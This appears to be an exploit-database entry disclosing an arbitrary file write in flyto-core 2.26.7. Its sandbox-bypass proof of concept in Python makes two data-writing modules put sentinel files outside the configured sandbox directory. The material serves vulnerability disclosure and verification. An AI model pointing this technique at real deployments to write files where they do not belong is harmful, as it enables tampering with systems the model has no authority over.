flyto-core 2.26.7 - Arbitrary File Write

EDB-ID:

52655

CVE:

N/A




Platform:

Multiple

Date:

2026-08-18


# Exploit Title: flyto-core 2.26.7 - Arbitrary File Write 

# Date: 2026-07-17

# Exploit Author: Pig-Tail (Jorge González Milla)

# Vendor Homepage: https://github.com/flytohub/flyto-core 

# Software Link: https://github.com/flytohub/flyto-core 

# Version: flyto-core <= 2.26.7 (fixed 2.26.8; incomplete fix of GHSA-2956)

# Tested on: Linux

# CVE: N/A

# Category: webapps

# Full write-up & repo: https://github.com/Pig-Tail/security-research/tree/master/GHSA-p34x-fmph-9fjx-flyto-core 



data.csv_write / data.json_to_csv write caller-supplied paths without calling the validate_path_with_env_config() sandbox guard, escaping FLYTO_SANDBOX_DIR. Advisory: GHSA-p34x-fmph-9fjx.



The PoC is a benign, local verification harness (sentinel-based; no network attack, no

persistence, no destructive payload). Run against a local instance of the affected version.



--- PoC (poc_arbitrary_write.py) ---

"""PoC: arbitrary file write via unguarded sibling write modules (incomplete fix of GHSA-2956).

Run: FLYTO_SANDBOX_DIR is set to the intended confinement; the modules write OUTSIDE it."""

import os, sys, asyncio, tempfile

# Point FLYTO_SRC at a local flyto-core checkout (the `src` dir). Defaults to ./flyto-core/src.

FLYTO_SRC = os.environ.get("FLYTO_SRC", os.path.join(os.path.dirname(__file__), "flyto-core", "src"))

sys.path.insert(0, FLYTO_SRC)

_T = tempfile.mkdtemp(prefix="flyto_poc_")

# The intended confinement dir; the write modules escape it.

SBX = os.environ.setdefault('FLYTO_SANDBOX_DIR', os.path.join(_T, "sandbox"))

os.makedirs(SBX, exist_ok=True)

# Sentinel targets deliberately OUTSIDE the sandbox (a sibling temp dir, still local & benign).

_OUTDIR = tempfile.mkdtemp(prefix="flyto_outside_")

OUT = os.path.join(_OUTDIR, "flyto_PWNED_OUTSIDE.csv"); OUT2 = os.path.join(_OUTDIR, "flyto_PWNED_json.csv")

from core.utils import validate_path_with_env_config, PathTraversalError

try:

    validate_path_with_env_config(OUT); print("[guard] UNEXPECTED allow")

except PathTraversalError:

    print("[guard] GHSA-2956 guard validate_path_with_env_config() REJECTS out-of-sandbox path")

async def call(W, p): return await W(p, {}).execute()

from core.modules.atomic.data.csv_write import csv_write

from core.modules.atomic.data.json_to_csv import json_to_csv

r1 = asyncio.run(call(csv_write, {'file_path': OUT, 'data':[{'pwn':'SENTINEL_CSV'}]}))

r2 = asyncio.run(call(json_to_csv, {'input_data':[{'pwn':'SENTINEL_JSON'}], 'output_path': OUT2}))

for tag,out in [('data.csv.write',OUT),('data.json_to_csv',OUT2)]:

    inside = os.path.realpath(out).startswith(os.path.realpath(SBX))

    print(f"[{tag}] wrote={os.path.exists(out)} inside_sandbox={inside} -> {out}")

ok = os.path.exists(OUT) and not os.path.realpath(OUT).startswith(os.path.realpath(SBX))

print("BUG CONFIRMED (arbitrary write outside sandbox)" if ok else "NOT CONFIRMED")

print("  sample content:", open(OUT).read().strip())